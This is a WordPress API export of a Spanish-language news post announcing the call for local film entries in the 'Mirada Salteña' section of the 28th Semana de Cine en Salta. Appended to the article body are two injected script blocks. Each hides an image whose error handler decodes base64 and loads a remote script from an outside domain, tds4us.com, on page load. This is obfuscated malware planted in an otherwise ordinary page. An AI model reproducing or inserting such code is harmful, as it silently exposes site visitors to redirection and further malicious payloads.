{"id":4002,"date":"2024-05-13T11:36:02","date_gmt":"2024-05-13T14:36:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4002"},"modified":"2025-08-13T23:56:01","modified_gmt":"2025-08-14T02:56:01","slug":"participa-de-mirada-saltena-en-la-28a-semana-de-cine-en-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4002","title":{"rendered":"Particip\u00e1 de \u201cMirada Salte\u00f1a\u201d en la 28\u00aa Semana de Cine en Salta"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-76510fd416b9fd6d50c5f299f4320de5\" style=\"background-color:#74043a\"><em>Hasta el 31 de mayo, se encuentra abierta la convocatoria para formar parte de la secci\u00f3n emblem\u00e1tica de producciones locales en la pr\u00f3xima edici\u00f3n de la Semana de Cine.<\/em><\/h3>\n\n\n\n<p>Hasta el viernes 31 de mayo, ten\u00e9s la oportunidad de presentar tus producciones en distintas categor\u00edas. Se recepcionar\u00e1n trabajos realizados exclusivamente a partir de enero de 2023 y que no hayan sido parte de ediciones anteriores del evento.<\/p>\n\n\n\n<p>Los interesados en participar deber\u00e1n completar el formulario de inscripci\u00f3n disponible en el siguiente enlace: FORMULARIO DE INSCRIPCI\u00d3N.<\/p>\n\n\n\n<figure class=\"wp-block-embed\"><div class=\"wp-block-embed__wrapper\">\nhttps:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSfkdJkv6e9oR5RywwaYDtKXI0PhAdWyW0FI-qjztfHGcV7rkg\/viewform?usp=send_form\n<\/div><\/figure>\n\n\n\n<p>La selecci\u00f3n final de las obras que integrar\u00e1n \u00abLa mirada salte\u00f1a\u00bb estar\u00e1 a cargo de la Direcci\u00f3n de Audiovisuales, quienes tendr\u00e1n la dif\u00edcil tarea de elegir entre la riqueza creativa y diversidad de propuestas locales.<\/p>\n\n\n\n<p>La 28\u00aa Semana de Cine en Salta, programada para realizarse del 27 de junio al 6 de julio de este a\u00f1o contar\u00e1 en su programaci\u00f3n con las producciones de \u201cMirada Salte\u00f1a\u201d en un espacio destacado para la creciente producci\u00f3n audiovisual local, permitiendo a todos los espectadores conocer y disfrutar del talento y la dedicaci\u00f3n de nuestros realizadores salte\u00f1os y residentes.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/participa-de-mirada-saltenia-en-la-28-semana-de-cine-en-salta-95584\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hasta el 31 de mayo, se encuentra abierta la convocatoria para formar parte de la secci\u00f3n emblem\u00e1tica de producciones locales en la pr\u00f3xima edici\u00f3n de la Semana de Cine. Hasta el viernes 31 de mayo, ten\u00e9s la oportunidad de presentar tus producciones en distintas categor\u00edas. Se recepcionar\u00e1n trabajos realizados exclusivamente a partir de enero de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4003,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[23],"tags":[],"class_list":{"0":"post-4002","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-audio-visuales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4002"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4002"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4002\/revisions"}],"predecessor-version":[{"id":6787,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4002\/revisions\/6787"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4003"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4002"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4002"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4002"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}